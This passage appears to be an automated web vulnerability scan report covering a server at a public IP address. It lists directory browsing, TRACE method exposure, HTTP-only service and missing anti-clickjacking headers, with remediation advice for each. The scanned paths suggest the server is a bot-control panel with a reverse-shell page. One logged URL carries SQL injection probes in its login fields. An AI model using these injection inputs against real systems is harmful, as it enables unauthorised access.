| Evidence | <title>Index of /xampp</title> |
| Request Header - size: 257 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=M;O=A |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <title>Index of /xampp</title> |
| Request Header - size: 203 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=M;O=D |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <title>Index of /xampp</title> |
| Request Header - size: 257 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=N;O=A |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <title>Index of /xampp</title> |
| Request Header - size: 257 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=N;O=D |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <title>Index of /xampp</title> |
| Request Header - size: 203 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=S;O=A |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <title>Index of /xampp</title> |
| Request Header - size: 203 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=S;O=D |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <title>Index of /xampp</title> |
| Request Header - size: 257 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| Instances | 10 |
| Solution |
Configure the web server to disable directory browsing.
|
| Reference | https://cwe.mitre.org/data/definitions/548.html |
| Tags |
OWASP_2021_A05
OWASP_2017_A06 |
| CWE Id | 548 |
| WASC Id | 16 |
| Plugin Id | 10033 |
|
Medium |
HTTP Only Site |
|---|---|
| Description |
The site is only served under HTTP and not HTTPS.
|
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 699 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 14 bytes. | |
| Response Body - size: 0 bytes. | |
| Instances | 1 |
| Solution |
Configure your web or application server to use SSL (https).
|
| Reference |
https://cheatsheetseries.owasp.org/cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html
https://letsencrypt.org/ |
| Tags |
OWASP_2021_A05
WSTG-v42-SESS-02 OWASP_2017_A06 |
| CWE Id | 311 |
| WASC Id | 4 |
| Plugin Id | 10106 |
|
Medium |
Insecure HTTP Method - TRACE |
|---|---|
| Description |
The insecure HTTP method [TRACE] is enabled for this resource, and is exploitable. The TRACK and TRACE methods may be used by an attacker, to gain access to the authorisation token/session cookie of an application user, even if the session cookie is protected using the HttpOnly flag. For the attack to be successful, the application user must typically be using an older web browser, or a web browser which has a Same Origin Policy (SOP) bypass vulnerability.
|
| URL | http://142.202.242.172 |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | 2R0Tvyu9hL9OkaP1ANptwqTDZvLLezZcVOtHikcK |
| Request Header - size: 216 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 195 bytes. | |
| URL | http://142.202.242.172 |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | C1dqiAR58i46kxxkCaT8D4EW6IukmEFk3CXN6jCc |
| Request Header - size: 216 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 195 bytes. | |
| URL | http://142.202.242.172 |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | FRmdke6T6iK96lZpSTKVrTnEPcnHmCdLKodGEcQW |
| Request Header - size: 216 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 195 bytes. | |
| URL | http://142.202.242.172 |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | gb2iK69Gqat7XheJo3lrfPVkAdwqXuZH3HX0ZLf2 |
| Request Header - size: 216 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 195 bytes. | |
| URL | http://142.202.242.172 |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | q4xRFOoFC9OldDI54eujhXZAqKYPcvmp4usnXTBh |
| Request Header - size: 216 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 195 bytes. | |
| URL | http://142.202.242.172 |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | R42Qj9ULBA1QxDjf0kAw4uBKBmHQJ11gipgyifkz |
| Request Header - size: 254 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 233 bytes. | |
| URL | http://142.202.242.172/ |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | 2I2njUTA07fHPutp0cy5LYD7b3rLNVxkmAHFQKtj |
| Request Header - size: 255 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 233 bytes. | |
| URL | http://142.202.242.172/ |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | 9les1XFsL6VR6eqgKs0dfyR16xkV0soFy3MbxWnd |
| Request Header - size: 217 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 195 bytes. | |
| URL | http://142.202.242.172/ |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | dEyqrRMmnEa4KSXPVchQR7XLDMhPIASq0Eu4jmct |
| Request Header - size: 217 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 195 bytes. | |
| URL | http://142.202.242.172/ |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | NnRFjbr47RVePMU3uuSflsEnSAxnwN385qzHGjn5 |
| Request Header - size: 217 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 195 bytes. | |
| URL | http://142.202.242.172/?C=S;O=D |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | abViMg4o7KHJOQ36hCFXYI0BAEeib4vWcH8WVP8D |
| Request Header - size: 305 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 283 bytes. | |
| URL | http://142.202.242.172/?C=S;O=D |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | CBlynVvPXuJAfDo5mtth3ttuUr2VjgzqciilDYyE |
| Request Header - size: 305 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 283 bytes. | |
| URL | http://142.202.242.172/?C=S;O=D |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | Gu99GtFi6IzvRic8kMGz6L0U5qD1YSAU6KdFsgDE |
| Request Header - size: 305 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 283 bytes. | |
| URL | http://142.202.242.172/?C=S;O=D |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | T4zHMQvENTWubM3MvBkFsCHsPgzmriECR1zxPt82 |
| Request Header - size: 305 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 283 bytes. | |
| URL | http://142.202.242.172/?C=S;O=D |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | ZmJHiCAtzQaQrejgukN1XWH2RQrucOD4QdaUC9uG |
| Request Header - size: 267 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 245 bytes. | |
| URL | http://142.202.242.172/robots.txt |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | i4MbrtE1PUj0ltaHh6okLSbuUwHgSpQSwAdC1WQK |
| Request Header - size: 227 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 205 bytes. | |
| URL | http://142.202.242.172/robots.txt |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | Nj92eLAdIMOu1a1J1nhSU8MoWEv1GGKjJV3enFIL |
| Request Header - size: 265 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 243 bytes. | |
| URL | http://142.202.242.172/robots.txt |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | vLCI3cvW49VelI3bNvMIOkfci4SJExoKIVtZTSp2 |
| Request Header - size: 227 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 205 bytes. | |
| URL | http://142.202.242.172/robots.txt |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | xWkw2N5KYFjRksznXQDjsHTNOr0XJnCRjw7Br7iF |
| Request Header - size: 227 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 205 bytes. | |
| URL | http://142.202.242.172/robots.txt |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | zfOmljZ7hE3MCVtPxWKiQiAShby632L2FqF7SacB |
| Request Header - size: 227 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 205 bytes. | |
| URL | http://142.202.242.172/sitemap.xml |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | 7wbvWpdKReOt1CwNhnbNMqNNe5Odm5jF4YQD6RAJ |
| Request Header - size: 228 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 206 bytes. | |
| URL | http://142.202.242.172/sitemap.xml |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | ePKPD4fYx8vNIJzgW5AVY6GGFPJXW6o6dlNR8duM |
| Request Header - size: 228 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 206 bytes. | |
| URL | http://142.202.242.172/sitemap.xml |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | NKZHj7JrDHQkbK62VNKSjdsYd22qE8B5OoKKOzrb |
| Request Header - size: 228 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 206 bytes. | |
| URL | http://142.202.242.172/sitemap.xml |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | yHPdmiMmb4ZM2EyI0DUGhIs2EkL99xpR42mf9Dri |
| Request Header - size: 266 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 244 bytes. | |
| URL | http://142.202.242.172/sitemap.xml |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | zY38n5jdV8jyhqnQj8pstpF9KYyOvUzcHBsKfRBN |
| Request Header - size: 228 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 206 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/Capture.PNG |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | f84PI1L5YaW1q5RmI33Au6e9s06cN4rolKrCprpe |
| Request Header - size: 220 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 198 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/Capture.PNG |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | jZ7raYfnoZsXYdbjGF4htSJv7hY8ysNyFxJlknM4 |
| Request Header - size: 220 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 198 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/Capture.PNG |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | sSnqJWst8ZBrwqsK6WHbd6nRkMbV3mUtVs3MpYlX |
| Request Header - size: 419 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 397 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/Capture.PNG |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | TrsK52ivqavAD9zRC2XUrtS6DTMYXqxHfAgf5aFJ |
| Request Header - size: 754 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 732 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/Capture.PNG |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | XgBlQ07DGPLWIHvhAwJCDkweVKwXDt7Mll9rFacZ |
| Request Header - size: 716 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 694 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | Dwry1geRJTF3mh09e4XHs2LmioCCOxUun73gUuFX |
| Request Header - size: 287 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 265 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | 8oyDtuUEBbp9LtiJGWWuiLurQXqPIaSrQlWajivU |
| Request Header - size: 489 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 467 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | X2FQFq6CA5Ia4Xw8onKuA6gFBjBLt857Z50AlOTk |
| Request Header - size: 499 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 477 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | F8MRAivj25dUIPDG4pjc5Rdc10wXRglIQoZZYsw4 |
| Request Header - size: 809 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 787 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects/error.wav |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | 5HfloJwuc2DaTWjCSW9nOHn3YPdE7ewAvUEbaIE9 |
| Request Header - size: 433 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 411 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects/error.wav |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | 9zw2FMrH49QmlGcFdIL8gZP9MacdNoAnXpMmFdkb |
| Request Header - size: 433 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 411 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects/error.wav |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | DBo7I0ZXAFy3JoeonIzkf7EB3phQc1wVLOeSNrzm |
| Request Header - size: 259 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 237 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects/error.wav |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | nAcf53rC2yfqA5kAWGBySxLbF9qhoJqwZ4yAucFw |
| Request Header - size: 724 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 702 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects/error.wav |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | S19UwCgu7Mr0k4YnilTm4OppshKHU5VJTFHGEVqQ |
| Request Header - size: 259 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 237 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects/error.wav |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | sY5pFoRk0sa5ZAh40ycdmQSLrvSrRjD6yRj5rsJ9 |
| Request Header - size: 433 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 411 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects/error.wav |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | zZcAsiirSXlVb8NLVgShbWCXUwzVuCussEXuZXU0 |
| Request Header - size: 686 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 664 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | KEJ81tp5GME5lfgQiq5qwDsRYhplVT26plhRG1su |
| Request Header - size: 519 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 497 bytes. | |
| URL | http://142.202.242.172/xampp/ |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | 7nm2yAFkrxrd6VV8Jd6mtN3dSD8VI3oNX9iEXamB |
| Request Header - size: 261 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 239 bytes. | |
| URL | http://142.202.242.172/xampp/ |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | FDyue4q9h5tyCY5JMCWwHqspRpSy3lH6A1zcVObm |
| Request Header - size: 223 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 201 bytes. | |
| URL | http://142.202.242.172/xampp/ |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | JEwMPGWAXW2IE5GZlKcJ1RhqQ3qCKK5sQEm3Lue5 |
| Request Header - size: 223 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 201 bytes. | |
| URL | http://142.202.242.172/xampp/ |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | LBrokDjPF0IszhEGAXDeXDN6XQfKwBv9yprRBIS5 |
| Request Header - size: 257 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 235 bytes. | |
| URL | http://142.202.242.172/xampp/?C=N;O=A |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | bD0UyfBfsngNxWzghbP7PWI961wxOcd85lsCC898 |
| Request Header - size: 317 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 295 bytes. | |
| URL | http://142.202.242.172/xampp/?C=S;O=D |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | a4v4RE18hWMMDo3tEL8Fr4BgGs7To8MqVbJq8lnR |
| Request Header - size: 317 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 295 bytes. | |
| URL | http://142.202.242.172/xampp/?C=S;O=D |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | dGdkh03auMzlxZXcvLVFSsCrdBeLWcdmqqcWoAtw |
| Request Header - size: 317 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 295 bytes. | |
| URL | http://142.202.242.172/xampp/?C=S;O=D |
| Method | TRACE |
| Parameter | |
| Attack | |
| Evidence | LnCFLO7PLPLgxCOy4xxKbkkWsflWJEM05QiSFOTA |
| Request Header - size: 317 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 159 bytes. | |
| Response Body - size: 295 bytes. | |
| Instances | 50 |
| Solution |
Disable insecure methods such as TRACK, TRACE, and CONNECT on the web server, and ensure that the underlying service implementation does not support insecure methods.
|
| Reference | https://cwe.mitre.org/data/definitions/205.html |
| Tags |
OWASP_2021_A05
WSTG-v42-CONF-06 OWASP_2017_A06 |
| CWE Id | 200 |
| WASC Id | 45 |
| Plugin Id | 90028 |
|
Medium |
Missing Anti-clickjacking Header |
|---|---|
| Description |
The response does not include either Content-Security-Policy with 'frame-ancestors' directive or X-Frame-Options to protect against 'ClickJacking' attacks.
|
| URL | http://142.202.242.172 |
| Method | GET |
| Parameter | x-frame-options |
| Attack | |
| Evidence | |
| Request Header - size: 148 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 790 bytes. | |
| URL | http://142.202.242.172/ |
| Method | GET |
| Parameter | x-frame-options |
| Attack | |
| Evidence | |
| Request Header - size: 149 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 790 bytes. | |
| URL | http://142.202.242.172/?C=D;O=A |
| Method | GET |
| Parameter | x-frame-options |
| Attack | |
| Evidence | |
| Request Header - size: 191 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 790 bytes. | |
| URL | http://142.202.242.172/?C=D;O=D |
| Method | GET |
| Parameter | x-frame-options |
| Attack | |
| Evidence | |
| Request Header - size: 199 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 790 bytes. | |
| URL | http://142.202.242.172/?C=M;O=A |
| Method | GET |
| Parameter | x-frame-options |
| Attack | |
| Evidence | |
| Request Header - size: 191 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 790 bytes. | |
| URL | http://142.202.242.172/?C=M;O=D |
| Method | GET |
| Parameter | x-frame-options |
| Attack | |
| Evidence | |
| Request Header - size: 199 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 790 bytes. | |
| URL | http://142.202.242.172/?C=N;O=A |
| Method | GET |
| Parameter | x-frame-options |
| Attack | |
| Evidence | |
| Request Header - size: 199 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 790 bytes. | |
| URL | http://142.202.242.172/?C=N;O=D |
| Method | GET |
| Parameter | x-frame-options |
| Attack | |
| Evidence | |
| Request Header - size: 191 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 790 bytes. | |
| URL | http://142.202.242.172/?C=S;O=A |
| Method | GET |
| Parameter | x-frame-options |
| Attack | |
| Evidence | |
| Request Header - size: 191 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 790 bytes. | |
| URL | http://142.202.242.172/?C=S;O=D |
| Method | GET |
| Parameter | x-frame-options |
| Attack | |
| Evidence | |
| Request Header - size: 199 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 790 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/Bots.php?id=54 |
| Method | GET |
| Parameter | x-frame-options |
| Attack | |
| Evidence | |
| Request Header - size: 718 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 366 bytes. | |
| Response Body - size: 12,091 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54 |
| Method | GET |
| Parameter | x-frame-options |
| Attack | |
| Evidence | |
| Request Header - size: 646 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 366 bytes. | |
| Response Body - size: 17,675 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | x-frame-options |
| Attack | |
| Evidence | |
| Request Header - size: 301 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 200 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | x-frame-options |
| Attack | |
| Evidence | |
| Request Header - size: 289 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 200 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd |
| Method | GET |
| Parameter | x-frame-options |
| Attack | |
| Evidence | |
| Request Header - size: 1,173 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 219 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54 |
| Method | GET |
| Parameter | x-frame-options |
| Attack | |
| Evidence | |
| Request Header - size: 741 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 366 bytes. | |
| Response Body - size: 7,351 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54 |
| Method | GET |
| Parameter | x-frame-options |
| Attack | |
| Evidence | |
| Request Header - size: 790 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 365 bytes. | |
| Response Body - size: 7,351 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54 |
| Method | GET |
| Parameter | x-frame-options |
| Attack | |
| Evidence | |
| Request Header - size: 543 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 367 bytes. | |
| Response Body - size: 14,616 bytes. | |
| URL | http://142.202.242.172/xampp/ |
| Method | GET |
| Parameter | x-frame-options |
| Attack | |
| Evidence | |
| Request Header - size: 189 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=D;O=A |
| Method | GET |
| Parameter | x-frame-options |
| Attack | |
| Evidence | |
| Request Header - size: 203 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=D;O=D |
| Method | GET |
| Parameter | x-frame-options |
| Attack | |
| Evidence | |
| Request Header - size: 257 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=M;O=A |
| Method | GET |
| Parameter | x-frame-options |
| Attack | |
| Evidence | |
| Request Header - size: 203 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=M;O=D |
| Method | GET |
| Parameter | x-frame-options |
| Attack | |
| Evidence | |
| Request Header - size: 257 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=N;O=A |
| Method | GET |
| Parameter | x-frame-options |
| Attack | |
| Evidence | |
| Request Header - size: 257 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=N;O=D |
| Method | GET |
| Parameter | x-frame-options |
| Attack | |
| Evidence | |
| Request Header - size: 203 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=S;O=A |
| Method | GET |
| Parameter | x-frame-options |
| Attack | |
| Evidence | |
| Request Header - size: 203 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/xampp/?C=S;O=D |
| Method | GET |
| Parameter | x-frame-options |
| Attack | |
| Evidence | |
| Request Header - size: 257 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 172 bytes. | |
| Response Body - size: 773 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | POST |
| Parameter | x-frame-options |
| Attack | |
| Evidence | |
| Request Header - size: 1,060 bytes. | |
| Request Body - size: 90 bytes. | |
